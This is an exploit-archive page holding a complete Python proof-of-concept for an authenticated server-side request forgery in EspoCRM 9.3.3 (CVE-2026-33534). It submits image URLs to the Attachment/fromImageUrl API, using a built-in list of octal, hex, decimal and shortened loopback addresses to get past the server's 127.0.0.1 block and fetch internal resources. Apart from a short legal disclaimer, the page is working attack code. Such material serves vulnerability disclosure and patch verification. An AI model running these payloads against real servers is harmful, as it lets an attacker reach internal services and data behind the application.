Skip to main content

EspoCRM 9.3.3 – SSRF

Categories: WebApps

EspoCRM 9.3.3 – SSRF

Proof of Concept (PoC)

poc.py
# Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
# Google Dork: N/A
# Date: 2026-05-08
# Exploit Author: Max Gabriel (https://github.com/EntroVyx)
# Vendor Homepage: https://www.espocrm.com/
# Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3
# Version: 9.3.3
# Tested on: EspoCRM 9.3.3, Debian/Kali, Apache/PHP
# CVE : CVE-2026-33534
# Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
#
# Usage:
#   python3 CVE-2026-33534.py -u http://127.0.0.1:8083 -U admin -P 'Admin12345!' --internal-port 8083 --cleanup
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --internal-port 9002 --internal-path /interno.png
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload 0x7f000001 --payload 2130706433

import argparse
import json
import sys
from pathlib import Path
from urllib.parse import urlparse, urlunparse

import requests


# Built-in host payloads tried when --no-default-payloads is not given.
# Each entry is a (label, host) pair: the label is only used in printed output,
# the host string is placed verbatim into the URL submitted to the target.
# The labels describe the alternative IPv4 notation each host string uses.
DEFAULT_LOOPBACK_PAYLOADS = [
    ("octal dotted", "0177.0.0.1"),
    ("octal dotted padded", "0177.0000.0000.0001"),
    ("octal compressed", "0177.1"),
    ("hex dotted", "0x7f.0.0.1"),
    ("hex dotted full", "0x7f.0x0.0x0.0x1"),
    ("hex dword", "0x7f000001"),
    ("decimal dword", "2130706433"),
    ("octal dword", "017700000001"),
    ("short IPv4 two-part", "127.1"),
    ("short IPv4 three-part", "127.0.1"),
    ("zero-padded dotted", "127.000.000.001"),
    ("long zero-padded octal", "0000000000000000000000000177.0.0.1"),
]


def normalize_base_url(value):
    """Return *value* without trailing slashes after checking it is a full URL.

    Raises:
        argparse.ArgumentTypeError: if the URL lacks a scheme or a host part.
    """
    trimmed = value.rstrip("/")
    parts = urlparse(trimmed)

    if parts.scheme and parts.netloc:
        return trimmed

    raise argparse.ArgumentTypeError("target URL must include scheme and host")


def default_internal_port(base_url):
    """Return the port of *base_url*, or the scheme default when none is given.

    The fallback is 443 for ``https`` and 80 for every other scheme.
    """
    parts = urlparse(base_url)
    explicit_port = parts.port

    if explicit_port:
        return explicit_port

    if parts.scheme == "https":
        return 443

    return 80


def ensure_path(value):
    """Return *value* as an absolute URL path.

    An empty or missing value becomes ``"/"``; any other value gets a leading
    slash if it does not already start with one.
    """
    if not value:
        return "/"

    if value.startswith("/"):
        return value

    return "/" + value


def make_url(base_url, host, internal_port, internal_path):
    """Build a URL for *host* that reuses the scheme of *base_url*.

    The port is appended to the host only when it differs from the default
    port of the scheme (443 for ``https``, 80 otherwise). The path is
    normalized with ``ensure_path``; params, query and fragment are empty.
    """
    scheme = urlparse(base_url).scheme
    scheme_default_port = 443 if scheme == "https" else 80

    if internal_port == scheme_default_port:
        authority = host
    else:
        authority = f"{host}:{internal_port}"

    components = (scheme, authority, ensure_path(internal_path), "", "", "")

    return urlunparse(components)


def make_control_url(base_url, internal_port, internal_path):
    """Build the control URL, which uses the plain dotted host ``127.0.0.1``."""
    plain_loopback = "127.0.0.1"

    return make_url(base_url, plain_loopback, internal_port, internal_path)


def load_payloads(args):
    """Collect the (label, host) payloads selected by the parsed arguments.

    Sources, in order: the built-in list (unless ``args.no_default_payloads``),
    each ``args.payload`` entry labelled ``"custom"``, then the lines of
    ``args.payload_file``. File lines that are blank or start with ``#`` are
    skipped; a ``label=host`` line supplies its own label, any other line is
    labelled ``file:<line number>``.

    Returns:
        A list of (label, host) tuples with empty hosts removed and duplicate
        hosts dropped, keeping the first occurrence of each host.
    """
    candidates = [] if args.no_default_payloads else list(DEFAULT_LOOPBACK_PAYLOADS)

    candidates.extend(("custom", extra.strip()) for extra in (args.payload or []))

    if args.payload_file:
        file_lines = Path(args.payload_file).read_text().splitlines()

        for number, raw in enumerate(file_lines, start=1):
            entry = raw.strip()

            if not entry or entry.startswith("#"):
                continue

            fallback_label = f"file:{number}"
            name, separator, target = entry.partition("=")

            if separator:
                candidates.append((name.strip() or fallback_label, target.strip()))
            else:
                candidates.append((fallback_label, entry))

    # Dicts keep insertion order, so the first label seen for a host wins.
    label_by_host = {}

    for name, target in candidates:
        if target and target not in label_by_host:
            label_by_host[target] = name

    return [(name, target) for target, name in label_by_host.items()]


def post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout):
    """POST *image_url* to the ``Attachment/fromImageUrl`` API endpoint.

    The JSON body always carries ``url``, ``field`` and ``parentType``;
    ``parentId`` is added only when *parent_id* is truthy.

    Returns:
        Whatever ``session.post`` returns.
    """
    body = {"url": image_url, "field": field, "parentType": parent_type}

    if parent_id:
        body["parentId"] = parent_id

    target = f"{base_url}/api/v1/Attachment/fromImageUrl"

    return session.post(target, json=body, timeout=timeout)


def parse_json(response):
    """Return the decoded JSON body of *response*, or ``None`` if it is not JSON.

    ``ValueError`` is caught rather than ``json.JSONDecodeError`` because the
    exception raised by ``response.json()`` depends on the installed requests
    version and JSON backend (stdlib ``json`` or ``simplejson``). All of those
    decoder errors derive from ``ValueError``, while not all derive from
    ``json.JSONDecodeError``.
    """
    try:
        return response.json()
    except ValueError:
        return None


def short_body(response):
    """Return the response body as a single printable line of bounded length.

    Carriage returns and line feeds are replaced by the literal two-character
    sequences ``\\r`` and ``\\n`` so the body cannot break the one-line-per-result
    output. The escaped text is cut to 420 characters, followed by ``...``
    when it was longer.
    """
    # Escape the control characters themselves; ordinary letters are untouched.
    body = response.text.replace("\r", "\\r").replace("\n", "\\n")

    if len(body) > 420:
        return body[:420] + "..."

    return body


def delete_attachment(session, base_url, attachment_id, timeout):
    """Send a DELETE for the given attachment id.

    Returns:
        ``True`` when the response status is 200 or 204, ``False`` otherwise.
    """
    target = f"{base_url}/api/v1/Attachment/{attachment_id}"
    status = session.delete(target, timeout=timeout).status_code

    return status == 200 or status == 204


def is_successful_bypass(response):
    """Decide whether *response* reports a created attachment.

    Returns:
        A ``(success, data)`` tuple. ``success`` is ``True`` only for an
        HTTP 200 response whose JSON body is a dict with a truthy ``id``;
        ``data`` is the result of ``parse_json`` for the response.
    """
    data = parse_json(response)
    created = False

    if response.status_code == 200 and isinstance(data, dict):
        created = bool(data.get("id"))

    return created, data


def print_result(label, host, response, data):
    """Print one aligned result line for a tested payload.

    A ``[+]`` line with id, type and size is printed when *data* is a dict
    with a truthy ``id``. Otherwise a ``[-]`` line is printed with the
    ``X-Status-Reason`` header, falling back to the shortened body and then
    to ``-``.
    """
    has_attachment = isinstance(data, dict) and data.get("id")

    if not has_attachment:
        reason = response.headers.get("X-Status-Reason") or short_body(response) or "-"
        print(f"[-] {label:24} {host:38} HTTP {response.status_code} {reason}")

        return

    status_part = f"[+] {label:24} {host:38} HTTP {response.status_code} "
    detail_part = f"id={data.get('id')} type={data.get('type')} size={data.get('size')}"
    print(status_part + detail_part)


def main():
    """Parse the command line, run the control and payload requests, and report.

    Returns:
        The process exit code: 2 when there are no payloads to test or no
        payload produced an attachment; 0 when at least one payload succeeded
        and the direct 127.0.0.1 control request was answered with HTTP 403;
        1 when a payload succeeded but the control was not answered with 403.
    """
    parser = argparse.ArgumentParser(
        description="Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads."
    )
    parser.add_argument("-u", "--url", required=True, type=normalize_base_url, help="Base URL, e.g. http://host:8083")
    parser.add_argument("-U", "--username", required=True, help="EspoCRM username")
    parser.add_argument("-P", "--password", required=True, help="EspoCRM password")
    parser.add_argument("--internal-port", type=int, help="Internal loopback port for the self-fetch PoC")
    parser.add_argument("--internal-path", default="/client/img/logo-light.svg", help="Internal path for the self-fetch PoC")
    parser.add_argument("--payload", action="append", help="Additional loopback host notation to test, e.g. 0x7f000001")
    parser.add_argument("--payload-file", help="File with one host payload per line, or label=host")
    parser.add_argument("--no-default-payloads", action="store_true", help="Use only --payload/--payload-file entries")
    parser.add_argument("--field", default="avatar", help="Attachment field used by fromImageUrl")
    parser.add_argument("--parent-type", default="User", help="Parent entity type used by fromImageUrl")
    parser.add_argument("--parent-id", help="Optional parent entity id")
    parser.add_argument("--timeout", type=float, default=15.0, help="HTTP timeout")
    parser.add_argument("--cleanup", action="store_true", help="Attempt to delete attachments created by successful payloads")
    parser.add_argument("--stop-on-first", action="store_true", help="Stop after the first successful payload")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification")
    args = parser.parse_args()

    payloads = load_payloads(args)

    # Possible when --no-default-payloads is given without any custom payloads.
    if not payloads:
        print("[-] No payloads to test.")
        return 2

    # Without --internal-port, fall back to the port of the target base URL.
    internal_port = args.internal_port or default_internal_port(args.url)
    control_url = make_control_url(args.url, internal_port, args.internal_path)

    # One session carries the credentials, Accept header and TLS setting for all requests.
    session = requests.Session()
    session.auth = (args.username, args.password)
    session.headers.update({"Accept": "application/json"})
    session.verify = not args.insecure

    print(f"[*] Target: {args.url}")
    print(f"[*] Control URL: {control_url}")
    print(f"[*] Payload count: {len(payloads)}")

    # Control request: same endpoint and path, but with the plain 127.0.0.1 host.
    control = post_from_image_url(
        session,
        args.url,
        control_url,
        args.field,
        args.parent_type,
        args.parent_id,
        args.timeout,
    )

    print(f"[*] Control response: HTTP {control.status_code} {control.headers.get('X-Status-Reason') or short_body(control) or '-'}")

    # Only a warning: the payload loop still runs, but the final exit code reflects this.
    if control.status_code != 403:
        print("[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.")

    successes = []

    # Submit one request per payload host and record those that create an attachment.
    for label, host in payloads:
        ssrf_url = make_url(args.url, host, internal_port, args.internal_path)
        response = post_from_image_url(
            session,
            args.url,
            ssrf_url,
            args.field,
            args.parent_type,
            args.parent_id,
            args.timeout,
        )
        successful, data = is_successful_bypass(response)
        print_result(label, host, response, data)

        if successful:
            successes.append((label, host, ssrf_url, data))

            # Optionally delete the attachment that the successful request created.
            if args.cleanup and data.get("id"):
                if delete_attachment(session, args.url, data["id"], args.timeout):
                    print(f"    cleanup: deleted attachment {data['id']}")
                else:
                    print(f"    cleanup: failed to delete attachment {data['id']}")

            if args.stop_on_first:
                break

    if not successes:
        print("[-] No encoded loopback payload produced an attachment.")
        return 2

    print("")
    print("[+] Vulnerable behavior confirmed.")
    print(f"[+] Direct loopback control: HTTP {control.status_code}")
    print(f"[+] Successful payloads: {len(successes)}")

    for label, host, ssrf_url, data in successes:
        print(f"    - {label}: {host} -> {data.get('type')} ({ssrf_url})")

    # Exit 0 only when the control was blocked with 403; otherwise signal an inconclusive run.
    return 0 if control.status_code == 403 else 1


if __name__ == "__main__":
    # Run the tool; any requests-level failure is reported and mapped to exit code 1.
    try:
        exit_code = main()
    except requests.RequestException as exc:
        print(f"[-] HTTP error: {exc}")
        exit_code = 1

    sys.exit(exit_code)

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...